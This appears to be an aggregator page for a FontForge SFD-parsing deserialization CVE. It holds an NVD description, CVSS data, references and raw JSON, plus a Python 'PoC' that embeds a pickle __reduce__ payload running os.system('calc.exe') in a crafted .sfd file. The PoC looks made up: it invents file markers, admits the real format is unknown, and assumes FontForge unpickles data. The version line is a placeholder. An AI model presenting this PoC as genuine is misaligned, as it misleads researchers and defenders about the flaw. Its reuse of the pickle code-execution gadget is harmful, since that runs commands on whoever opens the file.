CVE-2025-15276

Description

FontForge SFD File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28198.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fontforge:fontforge:20251009:*:*:*:*:*:*:* - VULNERABLE

FontForge < 最新修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15276 FontForge SFD文件反序列化RCE PoC
# This PoC demonstrates the vulnerability in FontForge SFD file parsing
# Note: This is for educational and security research purposes only

import struct
import pickle
import os

class ExploitPayload:
    """
    Malicious payload that will be executed during deserialization
    This demonstrates the insecure deserialization vulnerability
    """
    def __reduce__(self):
        # This will execute calc.exe on Windows when deserialized
        # In real attack, this would be replaced with more sophisticated payload
        cmd = "calc.exe"  # Simple demonstration command
        return (os.system, (cmd,))

def create_malicious_sfd():
    """
    Generate a malicious SFD file that exploits the deserialization vulnerability
    The exact SFD format specifics would need to be researched for FontForge
    """
    # Create the malicious payload
    payload = pickle.dumps(ExploitPayload())
    
    # SFD file structure (simplified representation)
    # Real exploitation requires understanding FontForge's specific SFD format
    sfd_header = b"SplineFontDB: 3.0\n"
    sfd_fontname = b"FontName: MaliciousFont\n"
    
    # Malicious serialized data injected into the SFD structure
    # This represents the vulnerable data field that gets deserialized
    malicious_data = b"BeginDeserialization: " + payload + b"\nEndDeserialization\n"
    
    sfd_content = sfd_header + sfd_fontname + malicious_data
    
    return sfd_content

def main():
    print("[*] CVE-2025-15276 FontForge SFD Deserialization RCE PoC")
    print("[*] Generating malicious SFD file...")
    
    malicious_sfd = create_malicious_sfd()
    output_file = "CVE-2025-15276_malicious.sfd"
    
    with open(output_file, 'wb') as f:
        f.write(malicious_sfd)
    
    print(f"[+] Malicious SFD file created: {output_file}")
    print("[*] When opened with FontForge, this file will trigger arbitrary code execution")
    print("[*] Attack vector: User must open this malicious SFD file with FontForge")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15276
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15276
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15276/
[4] VulDB https://vuldb.com/cve/CVE-2025-15276
[5] https://www.zerodayinitiative.com/advisories/ZDI-25-1187/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15276", "sourceIdentifier": "[email protected]", "published": "2025-12-31T07:15:51.870", "lastModified": "2026-01-07T16:03:03.063", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FontForge SFD File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of FontForge. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of SFD files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28198."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por deserialización de datos no confiables durante el análisis de archivos SFD de FontForge. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de FontForge. Se requiere interacción del usuario para explotar esta vulnerabilidad, ya que el objetivo debe visitar una página maliciosa o abrir un archivo malicioso.\n\nLa falla específica existe dentro del análisis de archivos SFD. El problema resulta de la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en la deserialización de datos no confiables. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. Fue ZDI-CAN-28198."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fontforge:fontforge:20251009:*:*:*:*:*:*:*", "matchCriteriaId": "1C318A12-82C3-4AD4-9BDF-A7B485A20A38"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1187/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}